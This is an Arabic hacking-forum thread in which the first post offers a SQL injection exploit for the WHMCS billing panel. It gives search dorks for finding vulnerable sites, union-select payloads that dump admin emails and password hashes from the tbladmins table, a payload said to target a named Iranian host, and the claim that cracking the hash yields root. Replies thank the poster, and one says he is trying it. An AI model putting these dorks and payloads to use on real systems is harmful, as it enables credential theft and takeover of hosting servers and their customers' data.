ثغرت الروت طريقك للاحتراق برااايفت بس ما يغلى

ثغرت الروت طريقك للاحتراق برااايفت بس ما يغلى


النتائج 1 إلى 3 من 3

الموضوع: ثغرت الروت طريقك للاحتراق برااايفت بس ما يغلى

  1. #1

    افتراضي ثغرت الروت طريقك للاحتراق برااايفت بس ما يغلى

    السلام عليكم ورحمة الله ... !

    كيفكم ياشباب ان شاء الله بخير .. !

    ثغرة خطيرة بسكربت معروف عند الكل لكن ثغراته كانت برايفت تقريبا عند مجموعة من الهكر

    وتم ترويت العديد من السيرفر خصوصا تحديث 2010 قبل صدور اللوكات الجديدة

    الثغرة بسكربت وهم whm





    هالسكربت يعتبر كـسيبنل للروت يتحكم من خلاله بالسيرفر باضافة حسابات جديدة وحذف وتعديل ووووو الخ

    الثغرة هي من نوع SQL وهذا دليل لقوة هالنوع من الثغرات ... الاصابة عالية ... والملفات المصابة تقريبا 3

    اولا دورك الثغرة

    كود PHP:
    allinurl: "/submitticket.php"




    او

    كود PHP:
    allinurl: "/announcements.php"





    الاستغلال

    كود PHP:
    submitticket.php?step=2&deptid=001 and 1=0 union all select





    1,2,3,4,user****,6,7,8,password,10 from tbladmins--%20




    او

    كود PHP:
    announcements.php?id=1%27%20and%201=0%20union%20al l%20sElect%201,2,concat





    (email,0x3d,password),user****,5%20from%20tbladmin s--%20/




    للمعلومية هالثغرة مثل ماقلت تستطيع ترويت السيرفر بدون لوكل وذلك لمجرد الحصول على باسوورد الروت الموجود في الكونفق مشفر بمقياس Md5 فك التشفير وادخل من البيوتي والى روت ...!

    مثال على استضافة وسيرفر ايراني هدية لكم

    كود PHP:
    l%20sElect%201,2,concat%28email,0x3d,password%29,u ser****,5%20from%20tbladmins--%20/




    الكلمة المشفره n ame

    لوحة التحكم







    ملاحظة لاصحاب الاستضافات العربية لترقيع الثغرة وضع جدار ناري على اللوحة
    لملم شتاااتك من حياتي
    ما راح يكفي دام عمري وخسرته
    بعدي في حبك ولاني قادر
    ابقا معك بعد يلي افيني عاملته
    [email protected]
    يكفيني قهر منك ربي يسامحك

  2. #2

    افتراضي رد: ثغرت الروت طريقك للاحتراق برااايفت بس ما يغلى

    مشكوووووور جاري التجربه


    ==================================================

  3. #3

    افتراضي رد: ثغرت الروت طريقك للاحتراق برااايفت بس ما يغلى

    الله يعطك العافيه على الطرح
    بتوفيق لك


    اشهد ان لا اله الا الله وان محمد رسول الله

    http://www.aljyyosh.com/vb/showthread.php?t=25438


    افضل موقع


    www.livequran.org




المواضيع المتشابهه

  1. مشاركات: 41
    آخر مشاركة: 07-19-2012, 11:14 AM
  2. شرح ثغرت xss والتطبيق على موقع بالفيديو
    بواسطة ASDELY-ScOrPiOn في المنتدى قسم الثغرات
    مشاركات: 28
    آخر مشاركة: 02-24-2012, 02:00 PM
  3. ثغرت الفرنت بيج من zaina
    بواسطة zaina في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 1
    آخر مشاركة: 12-05-2010, 01:10 AM
  4. ثغرت متصفح 7
    بواسطة nazgul في المنتدى قسم الثغرات
    مشاركات: 1
    آخر مشاركة: 10-29-2010, 07:57 PM
  5. إستخراج باسوورد الروت من sql injection
    بواسطة rakan naber في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 0
    آخر مشاركة: 12-28-2009, 04:03 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •